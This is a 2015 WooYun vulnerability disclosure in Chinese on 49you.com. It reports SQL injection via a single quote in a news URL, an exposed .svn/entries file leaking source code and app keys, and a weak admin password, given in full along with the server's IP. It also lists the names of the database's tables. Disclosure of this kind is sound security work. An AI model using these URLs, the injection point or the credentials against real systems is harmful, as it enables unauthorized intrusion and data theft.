当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122886

漏洞标题:49you某处SQL注入+某站信息泄露+某后台弱口令

相关厂商:49you.com

漏洞作者: 小胖子

提交时间:2015-06-26 18:56

修复时间:2015-08-13 10:14

公开时间:2015-08-13 10:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

厂商萌萌哒

详细说明:

http://i.49you.com/
http://wwan.49you.com/.svn/entries
i.49you.com 整站都是注入
http://i.49you.com/news/item/catid/55/id/15'.html
随便找个伪静态,加个单引号报错

e.jpg


直接是注入

sqlin.jpg


另外一个APP站点SVN泄露源代码,可以泄露微信平台app key等东西哟

svn.jpg


http://180.150.185.34/
后台弱口令 49you 123456

漏洞证明:

Database: i_49you
[98 tables]
+--------------------+
| module |
| position |
| session |
| admin |
| admin_panel |
| admin_role |
| admin_role_priv |
| announce |
| attachment |
| attachment_index |
| badword |
| block |
| block_history |
| block_priv |
| cache |
| category |
| category_priv |
| collection_content |
| collection_history |
| collection_node |
| collection_program |
| content_check |
| copyfrom |
| datacall |
| dbsource |
| download |
| download_data |
| downservers |
| extend_setting |
| favorite |
| game |
| game_data |
| hits |
| ipbanned |
| keylink |
| keyword |
| keyword_data |
| link |
| linkage |
| log |
| member |
| member_detail |
| member_group |
| member_menu |
| member_verify |
| member_vip |
| menu |
| message |
| message_data |
| message_group |
| model |
| model_field |
| mood |
| news |
| news_data |
| page |
| pay_account |
| pay_payment |
| pay_spend |
| position_data |
| poster |
| poster_201409 |
| poster_space |
| queue |
| release_point |
| search |
| search_keyword |
| site |
| sms_report |
| special |
| special_c_data |
| special_content |
| sphinx_counter |
| sso_admin |
| sso_applications |
| sso_members |
| sso_messagequeue |
| sso_session |
| sso_settings |
| tag |
| template_bak |
| test_artice |
| test_artice_data |
| test_picture |
| test_picture_data |
| times |
| type |
| urlrule |
| video |
| video_content |
| video_data |
| video_store |
| vote_data |
| vote_option |
| vote_subject |
| wap |
| wap_type |
| workflow |
+--------------------+

修复方案:

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-29 10:12

厂商回复:

非常感谢白帽子童鞋 @小胖子,技术正常紧急修复中

最新状态:

暂无